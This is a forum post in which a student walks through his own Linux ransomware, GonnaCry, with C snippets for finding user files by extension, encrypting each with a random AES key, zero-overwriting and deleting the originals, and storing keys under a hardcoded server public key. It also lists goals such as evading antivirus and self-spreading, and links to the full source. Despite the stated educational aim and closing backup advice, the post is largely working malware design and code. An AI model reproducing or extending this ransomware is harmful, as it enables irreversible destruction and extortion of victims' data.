How ransomware work's and GonnaCry linux ransomware

Hey you all !

Since my last post here about the GonnaCry ransomware got unlisted, i’ve returned today to share the knowledge I acquire since may, developing this linux ransomware.

Motivations
Since the world wide spread of the wannacry ransomware in may 2017 affected so much countries and companies, I kept wondering: Is really hard to fuck with a company or person’s life with a computer?
The answer is Yes, it’s possible.
And ransomware is a computer virus so powerfull to do so.

My background
I am from Brazil and computer science student.
When I started developing this ransomware I only knew Python as a programming language, this helped me to understanding the basics how a Operating System and Library’s works. But further more I learned C because I wanted to know how stuff happens behind the os python library and others as well.

import os 
for a, b, c in os.walk(os.getcwd()):
   for file in c:
       print(os.path.join(file, a))

With this simple Python code snippet you can find all user’s file. LOL :stuck_out_tongue:
It feels powerfull to control your own computer with code.

What this tutorial is not

  • This isn’t a “how to fuck my enemy computer” post.
  • A step by step how to develop a computer virus.
  • A ransomware that I can use to be criminal and get money from.
  • Explanation how cryptography works (i will share some links below).

What is this for?

  • Share the knowledge with those who want to learn programming and Computer security.
  • To understand how a general purpose ransomware work’s (without having to reverse engineer other compiled ransomwares).

Lets Go!

From my point of view these are the things that a ransomware needs to do:

  • A ransomware should be able to do his activity without being detected
    and stopped.
  • Encrypt the files on the computer, with no comming back!
  • Only be able to recover files with the server private key.
  • Use two cryptography algorithms (AES for files and RSA/ECC to secure keys).
  • Encrypt files even if computer is offline or internet connection fall (and still no way to recover files).
  • Use some tecnique/vulnerability to self-spread (Hard part :grimacing:).
  • Not be caught by some anti-virus, even on linux.
  • Low memory use, to not make computer slow with encryption overhead.
  • handle iterruptions and a backup plan if the process is killed.

Other things that are not on this list are secondary concerns.

Walkthrough

Here is the start point of the ransomware: https://github.com/tarcisio-marinho/GonnaCry/blob/master/C/gonnacry.c
Let’s walkthrought it.

First the ransomware needs to know some path’s, such as the desktop directory path, trash, home, etc…
To get the user and home directory i will use some glibc librarys from unistd.h

char * home = get_home_enviroment(); // /home/USER/
char * desktop = get_desktop_enviroment(home); // /home/USER/Desktop/
char * username = get_username(); USERNAME
char * trash = get_trash_path(home); // /home/USER/.local/share/Trash/
char * media = get_media_path(username); 

With the paths we can enter in each folder, find files inside it, create new files, whatever we want.

First part - Finding the files

Now the ransomware needs to be aware of the files it will encrypt.
With the find_files function it will add each file found to a linked-list containing all files.
All the funcions are here: https://github.com/tarcisio-marinho/GonnaCry/blob/master/C/lib/func.c
This is a recursive function.
If finds a file, append to the linked-list.

         /* If finds a file, append to the linked list */
         if(ent->d_type == 8){ // it's a file

            while(ext != NULL){ // check file extension

                if(strcmp(get_filename_ext(path_to_file), ext) == 0){
                    append(files, path_to_file, NULL, NULL); 
                    break;
                }
                ext = strtok(NULL, " ");
            }

if finds a directory, he recursivly calls find_files inside this new directory

        }else if(ent->d_type == 4){ // it's a directory

            if(!(strcmp(ent->d_name, "..") == 0 || strcmp(ent->d_name, ".") == 0)){

                find_files(files, new_directory); // recursive call
               

            }
        }

At the end, the files linked-list will have the full path to the files that will probably be encrypted.

Second part - Start Encryption

Now, with the path of each file, the ransomware starts the encryption routine, called encrypt_files.

All crypto funcions here: https://github.com/tarcisio-marinho/GonnaCry/blob/master/C/lib/crypto.c

For each file in the list, he will try to open and create a new file.

old = fopen(files->info[2], "rb");
if(old != NULL){
    new_name = (char*) malloc(sizeof(char) * (strlen(files->info[2]) + 11));
    strcpy(new_name, files->info[2]);
    strcat(new_name, ".GNNCRY");
    new = fopen(new_name, "wb");

Generate a unique random key and IV for each file and call encrypt function(I let you guess what it does :slight_smile:).

    iv = generate_key(16);
    key = generate_key(32);
    /* Where encryption really happens*/
    encrypt(old, new, key, iv);

After the encryption, now we need to shred the old file, to never come back.
Let’s take a look at the shred function.

void *buf = malloc(BUF_SIZE); // allocate memory
memset(buf, 0, BUF_SIZE); // zero the memory
ssize_t ret = 0;
off_t shift = 0;
while((ret = write(fd, buf,
                  ((fsize - shift >BUF_SIZE)?
                  BUF_SIZE:(fsize - shift)))) > 0)
     shift += ret;

Now the old file bytes are overwritten with zeros, and then deleted.
Even with some recovery tool software, the original file is lost.

goto Second part - Start Encryption; //This repeats for each file on the linked list.

Third part - create Desktop file: enc_files.gc

This file will help the decryptor to get the path, key and iv used to encrypt each file.
First field is the random Key, then the random IV and the file path.
It looks like this:

6.V5Aw?d'b}{v$@AO(xr'?!ptWW-qADy:3Zd;B3zGrvufrUCQ:/home/tarcisio/Desktop/15109580_1182532868480776_7528793872271394864_n.jpg.water
uI5Lt2yC3OU@L}'x'mh3?m0&B10(;(SS:J0#,5K3V)ob9p)%Z:/home/tarcisio/Desktop/allegro/projeto-allegro.odt.water
'k14!3X(OhjFOb(hiBSf$JV#jb@s9'!j:Thhj'O%nWyebj8j7:/home/tarcisio/Desktop/allegro/main.c.water
VOpUQOfFqiHOdJCiw#aSE$c)R,K$PfPM:3Li(wp@im2Gpx5Vy:/home/tarcisio/Desktop/estruturas/RB/redblack.c.water
PkJu-JhU-V@}cVzebO)&!0'i@11c;Tb@:bGpNOj7gj-CS-vQX:/home/tarcisio/Desktop/estruturas/avl/avl.c.water
QUZnLi{uqX2whaQ'.usK52!K8bO&jf7b:%JC)Zihn5g0d7hpN:/home/tarcisio/Desktop/estruturas/B/B.c.water

Important part, this file needs to be encrypted with the server public key, that is hardcoded to the ransomware.
If this file isnt encrypted, the user can decrypt the files easly.
I will not explain why its done like this, instead, computerphile made a video about this, I highly recommend you watch it:

Final steps - free the memory allocated

For this last part, we will need to free all the memory allocated by the files linked-list and also the path variables declared at the beginning.

 /* Free the linked lists*/
 destroy(&files);
 destroy(&encrypted);
 destroy(&not_encrypted);

 /* Free the path variables */
 free(home);
 free(desktop);
 free(username);
 free(trash);
 free(media);
 free(test_path);

Final thoughts

Some functionalities needs to be added to this ransomware, but the basic structure is working.
Since there is two versions of the code, the Python version has more features than the C version that’s being developed day by day.

Not all ransomwares works this way, some have their peculiarities and more features.

Ransomware like WannaCry and Petya, are much more complex.

Recomendadtions

Always have backup.

Never pay the ransom.

Don’t trust suspicious links

There is no such thing as “Impenetrable system”

That’s all folks ! :slight_smile:

Github project page:

Contact:

https://twitter.com/tarcisiomarinh

3 Likes

VERY excited to play with this.
Thanks for your contribution!

2 Likes

This topic was automatically closed after 30 days. New replies are no longer allowed.